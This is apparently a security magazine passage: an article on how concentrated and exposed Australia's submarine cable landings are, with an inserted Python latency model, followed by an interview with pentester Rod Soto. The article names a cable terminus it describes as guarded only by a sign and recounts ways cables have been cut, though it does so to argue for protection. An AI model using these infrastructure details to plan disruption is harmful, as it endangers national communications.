Phone calls to the support teams in Australia to investigate seemed to have issues, but eventually a traceroute was obtained and this showed packets going into a core shared environment, exiting the ISPs in Sydney and then either timing out when transmitted under the ocean or taking several seconds to traverse the Pacific. Investigation of the European issues showed some unrelated networking problems that were related to accessing a different target server, and some issues also related to access to data in Australia and New Zealand. The key to identifying the issue was the traceroute showing delays into the Reach network, and even with additional cables going elsewhere the impact on the application was significant.
Normal connectivity between Australia and the UK has a latency per packet of 300ms, and around 250ms to the US; with the time taken consisting of a combination of the near speed of light photons traversing the fibre optic cables under the ocean and the requirement to regenerate the signal every hundred or so km. These limitations on the cables are due to the laws of physics rather than implementation, and to use the words of a famous fictional engineer: "I canna change the laws of physics".
With satellites these limitations are even worse: the time taken to travel the approximately 36,000km up to a geostationary satellite and back is 250ms, and with the additional distance between satellites at this altitude each packet may take a second or more to traverse between continents. For low earth orbit satellites the latency is less, but these move relative to the ground so internet connectivity is less predictable. For SSL there are several protocol related packets that must be exchanged synchronously before the data itself is sent (Hello Server, Hello Client, what security do you support server, what security can you use client, etc.), so with potentially several seconds spent just using a satellite to set up an exchange, timeouts are likely to occur, affecting the likelihood of successful application use and telephony via satellite. So, if the backup for the submarine cabling is satellite, it is likely that many business applications would back up and fail. In-country applications, however, would not be affected.
Consider what happened in 2008 and 2011 when multiple submarine cables were cut by ships dragging anchors, and the attempted cut of multiple cables in Egypt in 2012. The Internet slowed down in regions and connectivity was almost completely lost. So, if a slowdown can cause disruption of a system, consider what would happen if the cables into Australia were cut; particularly as they mostly go into one place. Would the backup connectivity cope? Most likely global systems, such as critical finance systems, and telephony would be disrupted, with major impact on the national economy and the systems of large corporations.

What Infrastructure is in Place?

Australia currently uses 3.4 Tbps of bandwidth on its cables connecting to the rest of the world, through the five cables coming into Sydney: the Southern Cross Cable Network, Australia-Japan Cable, Telstra's Endeavour, Pipe Networks PPC-1, and SeaMeWe-3. None of these is at capacity, but all of them connect into the east coast of Australia in Sydney. A single, lower capacity, older cable connects into Western Australia and on up to Singapore. Whilst capacity can be upgraded on these existing five links in Sydney via upgrades to the equipment at the endpoints, what can't be fixed with upgrades to these cables is resilience, due to them all coming into the same unsecured area (Figure 1).
Considering the statement from the Australian
Communications and Media Authority (ACMA) of
the submarine cable links being a “vital part of our
national infrastructure”, and the maintenance of two
maritime protection zones around the connections
into Sydney and the additional zone around Perth
the impression would be that these cables were
heavily guarded, with consideration for protection
and resilience at all points. This is not the case.
Whilst working in Sydney and looking into overall resilience for the Australian components of a global system, the author visited one of the cable terminuses at McMahons Point in Sydney. The protection consisted of a bright yellow sign warning that the cable was present – nothing more. See the picture below. So, it appears that the hope is that polite terrorists will take note of the word "Caution". Ironically, the author did get a picture that he has not included because it would appear to be racially motivated, but on one occasion he found two women in full burkas, thus hiding their identity, fishing in front of the sign – showing how easy unfettered access is. The McMahons Point ferry terminal is beside the tree on the right corner of the picture, showing how well thought out the maritime protection policy is (Figure 2).

Figure 1. Submarine Cable Connections into Australia

Risk of Failure and Terrorism

The point of this paper is to highlight two types of risk. Whilst there is capacity to spare on the current connectivity into Australia, the connections into a common unprotected area (Paddington in New South Wales, for example) do represent a risk from acts of God, dragged anchors, or terrorism. The slowdown due to reduced capacity if the east coast connections were lost would force all traffic to exit the country via Perth, and in-country connections and the external connection are unlikely to be able to cope. This would lead to use of the satellite links, and higher up the software stack there would be failures; eventually leading to timeouts, a backing up of traffic in financial transactions, and a major financial impact or ruin for companies or even the country, depending on how long the problem existed.
This isn't just a problem for the nation as a whole, but is something that must be considered in application and infrastructure design for global systems. Latency must be considered when siting web channels for distributed systems; particularly where frameworks that use the code-behind architecture (for example, JSP, ASP.NET, etc.) to minimise client and browser dependencies and use server side processing are in use. Thus, a web front end should be sited in region to avoid latency issues when tabbing between fields. However, when that front end calls to middle or back end tiers, a latency hit of several seconds could lead to the application being unusable from a user perspective or even just failing completely due to timeouts; so satellite backup for submarine cables, with unpredictable behaviour or long latency, is not a real option except to supplement the existing cable network.

Figure 2. McMahons Point Submarine Cable Terminus – Sydney
What will happen when the national broadband network is rolled out? Well, much of the existing web traffic and telephony usage is in country; but so much of the foreign connectivity is key (foreign payments, travel, international finance exchange, web searches, etc.) that the impact of its loss would be a major problem.
So, when doing penetration testing – which is all about making sure confidentiality and integrity are covered from a security point of view, but where availability must be considered too – thought must be given to the impact of latency under normal conditions, abnormally high traffic conditions due to connectivity issues, and complete failure of the connections. These can cause failure of the application or invocation of the disaster recovery procedures.
One of the techniques that is not often used, but which is very effective, is failure mode event analysis (FMEA) – a tool borrowed from the aircraft industry. In this, events are talked through to work out what would happen when a failure occurs, using the whole stack end to end. In doing so, it has often been found that the combination of high availability solutions can result in such an increase in complexity and unpredictable behaviour that availability is reduced. When doing FMEA on a global system, the increased latency or failure of international connectivity must be considered, and the way the system will behave on failure and recovery understood and catered for. The impact on the system and the owning company may be significant. However, what about the wider impact?
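To make two of the points above concrete (the synchronous TLS exchange that must complete before any data flows, and the FMEA habit of talking a failure through the whole stack), here is an added example in Python; it is not from the article or from any system it describes. It models one user transaction that makes several sequential calls from an in-region web front end to a back-end tier, over the primary cable path, the satellite fallback, and a total outage, and reports which scenario trips the application timeout. The round-trip figures, the five-call transaction, the 10 second timeout and the scenario names are assumptions chosen to match the article's rough numbers; the connection cost modelled is the TLS 1.2 full handshake (two round trips after the TCP one), which is what the article's "Hello" exchange refers to.

```python
from dataclasses import dataclass
from typing import Optional

# TCP's three-way handshake costs one round trip before any TLS message can be
# sent; a full TLS 1.2 handshake (ClientHello/ServerHello, key exchange,
# Finished) costs two more round trips before application data flows.
TCP_RTTS = 1
TLS12_RTTS = 2


@dataclass(frozen=True)
class Path:
    name: str
    rtt_ms: Optional[float]  # None means the path is down entirely


def connection_setup_ms(rtt_ms, tls_rtts=TLS12_RTTS):
    """Time spent on handshakes before the first byte of application data."""
    return rtt_ms * (TCP_RTTS + tls_rtts)


def call_ms(rtt_ms, new_connection, tls_rtts=TLS12_RTTS):
    """One request/response to a back-end tier: optional setup plus one data round trip."""
    setup = connection_setup_ms(rtt_ms, tls_rtts) if new_connection else 0
    return setup + rtt_ms


def transaction_ms(path, backend_calls, keep_alive):
    """Total time for one user transaction needing `backend_calls` sequential
    calls across `path`. With keep-alive only the first call pays for setup."""
    if path.rtt_ms is None:
        return None
    total = 0.0
    for i in range(backend_calls):
        total += call_ms(path.rtt_ms, new_connection=(i == 0 or not keep_alive))
    return total


def walk_through(paths, backend_calls, timeout_ms, keep_alive=False):
    """FMEA-style walk-through: for each scenario, the transaction time and verdict."""
    table = {}
    for p in paths:
        t = transaction_ms(p, backend_calls, keep_alive)
        if t is None:
            verdict = "FAIL: no connectivity, DR invocation"
        elif t > timeout_ms:
            verdict = "FAIL: timeout"
        else:
            verdict = "OK"
        table[p.name] = (t, verdict)
    return table


# Assumed figures loosely based on the article's numbers (250 ms Sydney to US
# by cable, "a second or more" per packet by satellite); not measurements.
SCENARIOS = [
    Path("normal: Sydney cable to US", 250),
    Path("east-coast cables cut: satellite backup", 1000),
    Path("all international links down", None),
]

if __name__ == "__main__":
    for keep_alive in (False, True):
        print(f"--- keep-alive={keep_alive}, 5 sequential back-end calls, 10 s timeout")
        for name, (t, v) in walk_through(SCENARIOS, 5, 10_000, keep_alive).items():
            shown = f"{t:.0f} ms" if t is not None else "-"
            print(f"{name:42s} {shown:>9s}  {v}")
```

The walk-through shows the shape of the article's argument rather than a prediction: on the cable path the transaction completes comfortably, on the satellite path the same five calls run to 20 seconds when every call opens a fresh TLS connection, and reusing one connection (keep-alive) brings it back under the timeout. That last row is the kind of design decision FMEA is meant to surface before the failover is exercised for real.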
Australia is a successful country, as well as being a beautiful and friendly one, but without communications to the outside world the financial and social impact would be enormous. Having five connections into the same area of the nation with only one older alternative on the other side of the country is an enormous risk. When the national broadband network initiative delivers the increased bandwidth, the increased requirements will make recovery even harder, so increasing the risk.


What Should be Done?

The first steps to protecting the nation, and the applications that run in it, are to protect the existing cables coming into the country. A sign informing potential terrorists, and nothing else, is not exactly adequate protection. In Egypt activist scuba divers tried to cut and destroy the cables. So, a genuine protective area against maritime attack is needed – although this would be difficult in an area as busy as Sydney harbour! However, at the very least the connection transition onto land should be secured, with barbed wire and monitoring; and a large sign probably wouldn't be advisable. Having the majority of the connections so important to the country coming into the same place is also ill advised.
Additional connections into Australia, coming into a different location than Sydney on the east coast, along with additional connections on the west coast, are desperately required – along with the acceptance that satellite connectivity is not a real answer due to the latency, which will cause timeouts and failures higher up the software stack.

Conclusion

Security assessments aren’t only about confidentiality and integrity, but about availability as well –
forming the CIA triad – and in a global system that
must include an understanding of the oceanic links
into a country. With Australia there are five connections into one area on one side of the country
and one into the other side, and these connections
are not well protected – which leads to a considerable risk from both accidental damage and terrorism. This would not just cripple a global distributed
system, but the country as a whole. The increased
latency of satellite links means that these are not a
suitable backup solution, so new connections elsewhere into the country are needed.

Colin Renouf

Colin Renouf is a long standing enterprise solutions architect with thirty years' experience in the industry – concentrating on the finance sector. He has authored many magazine articles ranging from Unix, through Java and on to security; and has also written and contributed to books on the subject. He is currently contracting for a well known credit card company, but his main loves are Australia and some of its people, singing, photography and just being with good company. Oh, and quantum physics, as he is an eternal scientist.

interview

Interview
with Rod Soto
Rod Soto is a security
researcher and board member
of HackMiami. He is a regular
speaker at hacking conferences
all over the country on the topics
of penetration testing tools and
methods, as well as the topic of
digital civil liberties. Rod Soto
was the winner of the 2012 Black
Hat Las Vegas Capture the Flag
hacking competition, and is the
founder and lead developer
of the Kommand&&Kontrol
competitive hacking tournament
series. He is currently a senior
security engineer with the
emergency response team of an
information security corporation
engaged in digital crime
intelligence analysis, vulnerability
assessments, penetration testing,
and malware reversal.


You won the Black Hat hacking competition last year. How were you preparing for this competition? Is there any way to prepare? What advice would you give to those who would like to try themselves in such a competition?

It was not easy and it took a lot of effort. I advise
those who want to get better at playing CTFs to
play as many as they can, save and follow write
ups of those challenges you couldn't get and study
and research as much as you can. Create your
own lab and create challenges.

How do you improve your skills?
Do you have any methods that have
proven to be more effective than
others? Could you share some with our
readers?

Improving your skills depends on your dedication
and willingness to learn new things. You need to
be up to date and willing to learn new technologies
and techniques that may not be easy at first and
that require studying hard.

Why did you choose Information Security
field for your profession instead of other
Information Technology domains?

My background is mainly in system architecture,
integration and administration. Throughout the
years I became more focused on Information Security as it became more significant in the organizations I was working for, plus I always thought
of information security as a very challenging and
changing industry.

What do you consider so challenging in
the field of Information Security? It seems
that you have a thing for competitions, is
this it or something else as well?:)

I do... :) It is a way of challenging myself to learn
new things and to face and adapt to unknown scenarios.

What were the biggest challenges that
you have ever experienced in the past,
especially when you worked as a Junior
Information Security professional?

Mostly access to the right information. I started becoming more knowledgeable as I started networking with colleagues, going to conferences and visiting hackerspaces. In many aspects of infosec you pretty much have to become an autodidact. You have to put in time, discipline and persistence to learn completely new things, in many cases with a high level of difficulty.

Do you have any suggestions for our
readers? Especially for those who would
like to become pentesters?

There are many books you can read or courses you can take but in reality you need a base
knowledge and understanding in networking,
operating systems, programming/scripting languages, application vulnerabilities and finally
exploit creation even if you will never create one
yourself.

Are there any specific personality traits
that one should have in order to achieve
success? What personality features are
valued in this job?

Like many jobs I believe patience, persistence, tolerance to frustration, a strong work ethic and ability to adapt to change are fundamental personality
traits needed to be successful.

What are the top 5 challenges for the
junior IT professional who would like to
learn and master skills in Information
Security?

- Orientation on career direction
- Efficient learning habits
- Mentorship
- Financial Aid
- Time

Sounds like a good plan, but how to find a mentor? How did you find yours?

I am mostly self taught. I did take some courses
and read lots of books but as far as a mentor – I
have never had one nor do I have one now. I did
find lots of help by attending a local hackerspace
HackMiami and I met some great people at DEFCON. Basically going into the community helped
me a lot when I was trying to learn new things.
Finding a mentor is not easy but there are certainly people in the community that are willing to help
newcomers. We do that at HackMiami.

Could you give few examples of learning
habits that appeared to be efficient in
your case? Maybe this will inspire our
readers to look for their own...

I read at least one relevant book per month, and I recreate as many vulnerabilities as I can in my own lab as they are published. If I find I need to learn further about a certain application or technology, I then research white papers, books and authors.

On the basis of your experience and
expertise, what is the best methodology
for learning and mastering Information
Security?

Patience, persistence, discipline and the ability to
tolerate frustration. This is not a field for the faint
of heart.

How is the career path for being
Information Security professional in terms
of salary and position? Is the Information
Security professional career path more
promising and better than other IT
professions?

Right now it is. The Information Security job market is dominated by employees. There are simply not enough people and there probably won't be for the near future. Financially speaking, it is definitely one of the best places to be in the IT industry. As a career it has also become a very relevant and challenging field, but as with any industry one should not rely on it for unsubstantiated longevity.

What are the best pentesting tools in your
opinion? Could you recommend some to
our readers?

I am a Metasploit kind of guy but I always try to replicate vulnerabilities and exploits without using it. I think Burp and Acunetix are great web scanners, and of course there are plenty of open source tools. I look at pentesting as mix and match. I always have to be prepared to think outside the box and try new tools, some of which I have to learn on the run.

What are your favorite methods for
penetration tests? The ones you consider
the most effective? Do you have a set with
which you start each task?

Know your target very well and your tools and the
rest will follow. Take your time to footprint, analyze
and understand the environment you are probing.
There are no "one" clicks.

What does HackMiami do? Is it a
Information Security platform/group for
Information Security minded people?

HackMiami is a hackerspace based in Miami, FL. It is composed of mostly information security professionals and we focus on information security research and education. We also have a maker wing that focuses on open source robotics and general maker projects.

This maker wing sounds great.
Could you tell us more about it?
On what projects you are working on
now?

Current projects are: unmanned submarine, micro drones, fighting robots. Here is a video of the quadcopter built by one of our members: http://www.youtube.com/watch?v=qn9Eq1mJ6Ks.

Could you describe one of the completed
and successful projects of this open
source section?
See quadcopter video.

There are some areas that don't have such
a nice initiative like HackMiami yet. Is it
hard to establish a hackerspace? What
things are required?

It is not easy. There are many challenges starting from financial support, potential liability and
dealing with many different personalities. At the
end of the day it depends on people's willingness
to participate and support the hackerspace. You
can always find a place to meet but if people are
not showing up or participating then you won't get
very far.

Malware, trojans, as well as the latest cyber attacks, are often ahead and unpredictable compared with most of the information security technology and tools. What suggestions do you have to prevent and minimize these kinds of attacks?

I do believe that offense must drive defense. Understanding, analyzing, reversing and using malicious tools in your own lab environment will give you the ability to visualize a malicious attacker's mindset and preferred attack vectors. You can never be 100% secure but you can minimize and mitigate potential threats by keeping yourself up to date on tools and vulnerabilities and doing your own research, not only technical but also using open source intelligence tools.

Could you recommend some good links
or reads about creating your own lab
environment?

There are 3 books that will get you started in my opinion. One of them is Metasploit the Pentester Guide. Second is Professional Penetration Testing, and third I would recommend the Web Application Hacker's Handbook.

How should one proceed with their own research? Could you give some tips for those who haven't done it yet?

Set up your lab. It does not cost much but it is important to have your own environment where you can experiment and break things without getting in trouble. You can use some of the open source hypervisors and operating systems publicly available on the internet.

What are the best open source intelligence tools in your opinion? I think our readers will be interested in this very much.

In my opinion those tools have yet to be developed. I have experimented with some commercial and open source tools and I do not think they are at the right place yet. There is a lot of work to be done in this area.

If there were cyber attacks targeting a specific destination in a specific country, would it be possible to trace back the attacker(s) accurately?

Attribution is always very challenging and very difficult to prove. There are many methods and tools though that may give you a certain level of confidence that an attack came from a specific source. Again there will be a level of uncertainty. As to how an organization or country deals with that level of uncertainty, that would depend on their own policies and rules of engagement.

What are the most dangerous, unpredictable and untraceable cyber attacks that happened in the past few years, based on your experience? Which industry was the main target of this kind of attack?

I have seen attacks directed at certain industries such as financial, infrastructure and major corporations. I definitely believe that SCADA infrastructure attacks are the most potentially dangerous attacks and the ones that may likely cause human casualties. I am not aware that such an event has happened yet, although governments and military contractors are training for these types of attack scenarios, both offensive and defensive. If a large scale SCADA attack takes place that results in loss of life, the most likely culprit would be a state sponsored attack.

How did it happen that you became a founder and developer of a competitive hacking tournament series?

I wanted an excuse to hang out with my friends
and party doing what we love the most :). I thought
it was cool to travel and do it in different places with
different people and make it fun and challenging.

What was your objective to form
Kommand && KonTroll competitive
hacking tournament series?

Kommand && KonTroll is a computer security
competition in a private environment where players are faced with different challenges. Most of
those challenges are web based or infrastructure.
We also have some binary reversal challenges,
but that is not our focus. We try to make it as
close to the "trenches" as we can, as we try to
give players a view of the underground. We use
publicly available software and vulnerabilities, or
we modify targets to be vulnerable. The game also implies defense as players are allowed to attack other players. This game allows players to
learn, experiment and practice with many information security tools and wares that they would
otherwise not be able to use or work with at their
current organizations.

How do you prepare the tasks for such
tournament? Does it take long? Where
you are searching for inspiration?

Yes it takes long... between 100 to 150 hours. I do
heavy research on scenarios, cultures, characters,
personalities, music, videos, history and real life
scenarios. Every challenge tells a story, in some
instances challenges could branch into whole new
ctf. I try to make it relevant and I try to make it fun.
I distribute challenges difficulty level in a way that
allows players with different skills to be able to play
and win the ctf.

You are involved in digital crime
intelligence analysis, can you tell us more
about it?
I can't without breaking my NDA. Sorry.

Cloud Computing and Virtualization
technologies are getting more
popular day by day. Do you think both
technologies might be a new target
for cyber attacks? Have you ever
discovered the latest attack techniques
done by attackers in Cloud Computing
environment?

I do believe those technologies definitely introduce new risks and vectors of attack. I do not believe that those technologies change attack methodologies; I believe they simply add more attack surface and possible single points of failure for many organizations. Organizations must be careful of putting all their eggs in the "cloud". I myself have been involved in situations where cloud outages presented a level of availability that organizations were simply not willing to tolerate.

You give talks about digital civil liberties... What are the biggest threats in this area for computer users and mostly for security specialists and pentesters?

I gave a talk at DEFCON XX Skytalks along with some of my colleagues where we warned that regulation of such tools was not farfetched, and of the need to address these tools as a right for law abiding citizens to research, study and to defend themselves. It does look, though, like we are marching towards more regulation and possibly strict limitation and even prohibition, like in some countries.

As far as digital civil liberties are concerned, what is your opinion about “hacktivism”? Is it a good way to prove the politicians wrong?

I am all for the right of people to dissent and protest as long as they do not break the law.

Do you have any plan to set up your own Information Security company in the future?

I have my own IT company called EITS and I also work with Information Security Services, Inc. out of Miami, FL.

Can you tell us a few words about EITS? How did it start and what kind of solutions/products does it offer?

My work was mostly system administration and support. It is now more towards security assessments and penetration testing.

Thank you Rod for this interview.
By PenTest Team
